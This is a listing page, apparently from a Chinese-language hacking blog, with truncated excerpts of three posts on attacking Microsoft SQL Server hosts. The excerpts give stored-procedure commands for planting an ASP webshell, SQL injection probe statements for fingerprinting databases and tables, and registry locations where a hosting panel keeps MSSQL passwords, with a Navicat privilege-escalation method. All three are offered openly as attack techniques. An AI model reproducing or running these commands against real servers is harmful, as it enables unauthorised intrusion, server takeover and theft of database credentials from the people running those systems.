3个MSSQL扩展,可用来获取WEBSHELL

EXEC [master].[dbo].[xp_makecab] 'c:\test.rar','default',1,'d:\cmd.asp' 打包 EXEC [master].[dbo].[xp_unpackcab] 'C:\test.rar','c:',1, 'n.asp' 解包,可以用于得到webshell EXEC [master].[dbo].[xp_readerrorlog] 1,'d...

- 阅读全文 -

手工MSSQL注入常用SQL语句

and exists (select * from sysobjects) //判断是否是MSSQL and exists(select * from tableName) //判断某表是否存在..tableName为表名 and 1=(select @@VERSION) //MSSQL版本 And 1=(select db_name()) //当前数据库名 and 1=(select @@ser...

- 阅读全文 -

navicat提权及星外主机注册表mssql密码位置

星外主机注册表mssql密码位置 1、HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11 2、HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFreeHost\ navicat是一个比较流行的MySQL管理工具,在很多服务器上都可以找到,有两个方法提权: 1、从日志文件里找密码,navic...

- 阅读全文 -